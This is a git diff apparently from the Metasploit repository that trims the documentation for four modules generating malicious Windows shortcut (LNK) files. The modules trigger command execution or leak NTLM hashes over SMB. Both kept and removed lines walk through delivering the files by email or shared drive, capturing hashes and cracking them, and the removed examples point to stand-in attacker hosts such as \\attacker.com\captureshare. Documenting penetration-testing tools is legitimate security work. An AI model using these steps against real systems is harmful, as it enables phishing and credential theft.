Cleares up docs

Author: msutovsky-r7

documentation/modules/auxiliary/fileformat/datablock_padding_lnk.md

@@ -1,10 +1,7 @@
-This module generates a malicious Windows shortcut (LNK) file that exploits padding in the command line arguments to execute arbitrary commands. It leverages environment variables and inserts whitespace padding to concatenate and run the specified payload when the LNK is opened.
-
-The technique allows command execution without direct user interaction beyond opening the shortcut, making it useful for phishing or payload delivery scenarios.
-
 ## Vulnerable Application
 
-Windows systems where LNK files are processed, such as in Explorer or when shortcuts are executed. This can lead to arbitrary command execution via manipulated command line buffers.
+Windows systems where LNK files are processed, such as in Explorer or when shortcuts are executed.
+This can lead to arbitrary command execution via manipulated command line buffers.
 
 References:
 - [ZDI-CAN-25373](https://www.zerodayinitiative.com/advisories/ZDI-CAN-25373/)
@@ -17,26 +14,15 @@ Disclosure Date: 2025-07-19.
 ## Verification Steps
 
 1. Start msfconsole.
-2. Load the module: `use auxiliary/fileformat/windows_lnk_padding`.
-3. Set required options (e.g., FILENAME, COMMAND).
-4. Optionally customize DESCRIPTION, ICON_PATH, or BUFFER_SIZE.
-5. Execute the module: `run`.
-6. A malicious LNK file will be generated.
-7. Deliver the LNK file to the target Windows system.
-8. Open the LNK file to trigger command execution (e.g., launching calc.exe).
+1. Load the module: `use auxiliary/fileformat/windows_lnk_padding`.
+1. Optionally customize FILENAME, DESCRIPTION, ICON_PATH, or BUFFER_SIZE.
+1. Execute the module: `run`.
+1. A malicious LNK file will be generated.
+1. Deliver the LNK file to the target Windows system.
+1. Open the LNK file to trigger command execution (e.g., launching calc.exe).
 
 ## Options
 
-### FILENAME
-
-Specifies the name of the generated LNK file.
-
-Default: `poc.lnk`
-
-Example:
-```
-set FILENAME exploit.lnk
-```
 
 ### COMMAND
 
@@ -106,5 +92,3 @@ msf auxiliary(fileformat/windows_lnk_padding) > run
 [*] Target command: C:\\Windows\\System32\\calc.exe
 [*] Auxiliary module execution completed
 ```
-
-Deliver `calc.lnk` to the target (e.g., via email attachment or shared folder). When opened, it executes `calc.exe` using the padded command line. Monitor for execution side effects or adjust the COMMAND for more advanced payloads like downloading and running scripts.

documentation/modules/auxiliary/fileformat/environment_variable_datablock_leak.md

@@ -1,10 +1,7 @@
-This module generates a malicious Windows shortcut (LNK) file that embeds a special UNC path within the EnvironmentVariableDataBlock of the Shell Link structure. When a victim right-clicks the LNK file in Windows Explorer, it triggers an automatic authentication attempt to the specified remote SMB server, enabling the capture of NTLM hashes.
-
-The exploit takes advantage of how Windows handles environment variables in LNK files during context menu operations, leading to unsolicited SMB connections without requiring the file to be opened.
-
 ## Vulnerable Application
 
-Windows systems where LNK files are processed in Explorer, particularly during right-click actions that load context menus. This can result in NTLM credential leaks over SMB.
+Windows systems where LNK files are processed in Explorer, particularly during right-click actions that load context menus.
+This can result in NTLM credential leaks over SMB.
 
 References:
 - [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
@@ -14,40 +11,17 @@ Disclosure Date: 2025-05-06.
 ## Verification Steps
 
 1. Start msfconsole.
-2. Load the module: `use auxiliary/fileformat/right_click_lnk_leak`.
-3. Set required options (e.g., FILENAME, UNC_PATH).
-4. Optionally customize DESCRIPTION, ICON_PATH, or PADDING_SIZE.
-5. Execute the module: `run`.
-6. A malicious LNK file is generated.
-7. Set up an SMB capture listener (e.g., `auxiliary/server/capture/smb`).
-8. Deliver the LNK file to the target system.
-9. Right-click the LNK file in Explorer to trigger the SMB connection.
-10. Monitor the listener for captured NTLM hashes.
+1. Load the module: `use auxiliary/fileformat/right_click_lnk_leak`.
+1. Optionally customize FILENAME, DESCRIPTION, ICON_PATH, or PADDING_SIZE.
+1. Execute the module: `run`.
+1. A malicious LNK file is generated.
+1. Set up an SMB capture listener (e.g., `auxiliary/server/capture/smb`).
+1. Deliver the LNK file to the target system.
+1. Right-click the LNK file in Explorer to trigger the SMB connection.
+1. Monitor the listener for captured NTLM hashes.
 
 ## Options
 
-### FILENAME
-
-The name of the generated LNK file.
-
-Default: `msf.lnk`
-
-Example:
-```
-set FILENAME context.lnk
-```
-
-### UNC_PATH
-
-The UNC path (e.g., `\\server\share`) that the LNK will attempt to access for credential capture.
-
-Default: `\\192.168.1.1\share`
-
-Example:
-```
-set UNC_PATH \\attacker.ip\captureshare
-```
-
 ### DESCRIPTION
 
 The description for the shortcut.
@@ -91,10 +65,6 @@ Generate the LNK file:
 
 ```
 msf > use auxiliary/fileformat/right_click_lnk_leak
-msf auxiliary(fileformat/right_click_lnk_leak) > set FILENAME context.lnk
-FILENAME => context.lnk
-msf auxiliary(fileformat/right_click_lnk_leak) > set UNC_PATH \\192.168.1.25\share
-UNC_PATH => \\192.168.1.25\share
 msf auxiliary(fileformat/right_click_lnk_leak) > set DESCRIPTION Fake Document
 DESCRIPTION => Fake Document
 msf auxiliary(fileformat/right_click_lnk_leak) > set ICON_PATH %SystemRoot%\\System32\\imageres.dll

documentation/modules/auxiliary/fileformat/icon_environment_datablock_leak.md

@@ -1,7 +1,3 @@
-This module generates a malicious Windows shortcut (LNK) file that embeds a special UNC path within the IconEnvironmentDataBlock of the Shell Link structure. When a victim browses to the directory containing the LNK file in Windows Explorer, it triggers an automatic authentication attempt to the specified remote SMB server, allowing for the capture of NTLM hashes.
-
-The exploit relies on how Windows processes LNK files with manipulated environment data blocks, leading to unsolicited SMB connections without requiring the user to open the file.
-
 ## Vulnerable Application
 
 Windows systems using Explorer to browse directories with LNK files, where the IconEnvironmentDataBlock can force SMB authentication leaks.
@@ -14,36 +10,16 @@ Disclosure Date: 2025-05-16.
 ## Verification Steps
 
 1. Start msfconsole.
-2. Load the module: `use auxiliary/fileformat/iconenvironmentdatablock_lnk`.
-3. Set options like FILENAME, UNC_PATH, or others as needed.
-4. Execute the module: `run`.
-5. A malicious LNK file is generated.
-6. If UNC_PATH is not set, an integrated SMB capture server starts.
-7. Place the LNK in a target directory.
-8. Browse the directory in Windows Explorer to trigger the SMB connection.
-9. Check the console for captured NTLM hashes.
+1. Load the module: `use auxiliary/fileformat/iconenvironmentdatablock_lnk`.
+1. Set options like FILENAME, or others as needed.
+1. Execute the module: `run`.
+1. A malicious LNK file is generated.
+1. Place the LNK in a target directory.
+1. Browse the directory in Windows Explorer to trigger the SMB connection.
+1. Check the console for captured NTLM hashes.
 
 ## Options
 
-### FILENAME
-
-The name of the generated LNK file.
-
-Default: `msf.lnk`
-
-Example:
-```
-set FILENAME leak.lnk
-```
-
-### UNC_PATH
-
-The UNC path (e.g., `\\server\share`) for the LNK to connect to. If unset, the module starts its own SMB server.
-
-Example:
-```
-set UNC_PATH \\192.168.1.100\share
-```
 
 ### DESCRIPTION
 
@@ -74,29 +50,6 @@ Example:
 set PADDING_SIZE 20
 ```
 
-### Advanced Options
-
-**SRVHOST**
-
-Local host for the integrated SMB server (if UNC_PATH is unset).
-
-Default: `0.0.0.0`
-
-Example:
-```
-set SRVHOST 192.168.1.25
-```
-
-**SRVPORT**
-
-Local port for the integrated SMB server.
-
-Default: `445`
-
-Example:
-```
-set SRVPORT 445
-```
 
 ## Scenarios
 
@@ -133,21 +86,3 @@ LM_CLIENT_CHALLENGE:Disabled
 NTHASH:samplehash
 NT_CLIENT_CHALLENGE:samplechallenge
 ```
-
-Crack the hash with tools like Hashcat.
-
-### Custom UNC Path Usage
-
-For an external SMB setup:
-
-```
-msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set UNC_PATH \\attacker.com\captureshare
-UNC_PATH => \\attacker.com\captureshare
-msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > run
-
-[*] Creating 'msf.lnk' file...
-[+] LNK file created: msf.lnk
-[*] Auxiliary module execution completed
-```
-
-Monitor the external server for authentication attempts.

documentation/modules/auxiliary/fileformat/specialfolder_leak.md

@@ -1,25 +1,19 @@
-This module generates a malicious Windows shortcut (LNK) file that embeds a special UNC path within the SpecialFolderDatablock of the Shell Link structure. When a victim browses to or interacts with the LNK file in Windows Explorer, it triggers an authentication attempt to the specified remote SMB server, enabling the capture of NTLM hashes.
-
-This technique leverages a vulnerability in how Windows handles certain LNK file structures, resulting in automatic SMB connections without user interaction. The module can either point to a user-specified UNC path or start an integrated SMB capture server to harvest credentials.
-
-Tested on Windows systems where Explorer processes LNK files.
-
 ## Vulnerable Application
 
-Windows operating systems that process LNK files via Explorer, particularly when browsing directories containing the malicious shortcut. This can lead to NTLM credential leaks over SMB.
+Windows operating systems that process LNK files via Explorer, particularly when browsing directories containing the malicious shortcut.
+This can lead to NTLM credential leaks over SMB.
 
 References:
 - [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
 - [Exploit-DB 42382](https://www.exploit-db.com/exploits/42382)
-- [Related Metasploit Module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb)
 
 Disclosure Date: 2025-05-10 (reported to MSRC).
 
 ## Verification Steps
 
 1. Start msfconsole.
 2. Load the module: `use auxiliary/fileformat/specialfolderdatablock_lnk`.
-3. Customize options as needed (e.g., set FILENAME, UNCPATH, or APPNAME).
+3. Customize options as needed (e.g., set FILENAME or APPNAME).
 4. Execute the module: `run`.
 5. A malicious LNK file will be generated.
 6. If not using a custom UNCPATH, the module starts an SMB capture server automatically.
@@ -29,27 +23,7 @@ Disclosure Date: 2025-05-10 (reported to MSRC).
 
 ## Options
 
-**FILENAME**
-
-Specifies the name of the generated LNK file.
-
-Default: `msf.lnk`
-
-Example:
-```
-set FILENAME malicious.lnk
-```
-
-**UNCPATH**
-
-Defines the UNC path (e.g., `\\server\share`) that the LNK file will attempt to access. If not set, the module starts its own SMB server.
-
-Example:
-```
-set UNCPATH \\192.168.1.100\share
-```
-
-**APPNAME**
+### APPNAME
 
 Sets the display name of the application in the LNK file. If empty, a random name is generated.
 
@@ -58,29 +32,6 @@ Example:
 set APPNAME FakeApp
 ```
 
-**Advanced Options**
-
-**SRVHOST**
-
-The local host to listen on for the integrated SMB server (if UNCPATH is not set).
-
-Default: `0.0.0.0`
-
-Example:
-```
-set SRVHOST 192.168.1.25
-```
-
-**SRVPORT**
-
-The local port for the integrated SMB server.
-
-Default: `445`
-
-Example:
-```
-set SRVPORT 445
-```
 
 ## Scenarios
 
@@ -107,7 +58,8 @@ msf auxiliary(fileformat/specialfolderdatablock_lnk) > run
 [*] Auxiliary module execution completed
 ```
 
-Deliver the `malicious.lnk` file to the target (e.g., via email or shared drive). When the victim opens the containing folder in Explorer, an SMB connection is attempted:
+Deliver the `malicious.lnk` file to the target (e.g., via email or shared drive).
+When the victim opens the containing folder in Explorer, an SMB connection is attempted:
 
 ```
 [*] SMB Captured - 2025-09-18 21:03:00 +0530
@@ -118,21 +70,3 @@ LM_CLIENT_CHALLENGE:Disabled
 NTHASH:examplehashvalue
 NT_CLIENT_CHALLENGE:examplechallenge
 ```
-
-Crack the captured hash using tools like Hashcat to recover credentials.
-
-### Using a Custom UNC Path
-
-If you have an external SMB server set up (e.g., for remote capture):
-
-```
-msf auxiliary(fileformat/specialfolderdatablock_lnk) > set UNCPATH \\attacker.server\captureshare
-UNCPATH => \\attacker.server\captureshare
-msf auxiliary(fileformat/specialfolderdatablock_lnk) > run
-
-[*] Generating malicious LNK file pointing to \\attacker.server\captureshare
-[+] malicious.lnk stored at /root/.msf4/local/malicious.lnk
-[*] Auxiliary module execution completed
-```
-
-Monitor your external SMB server for incoming authentication attempts.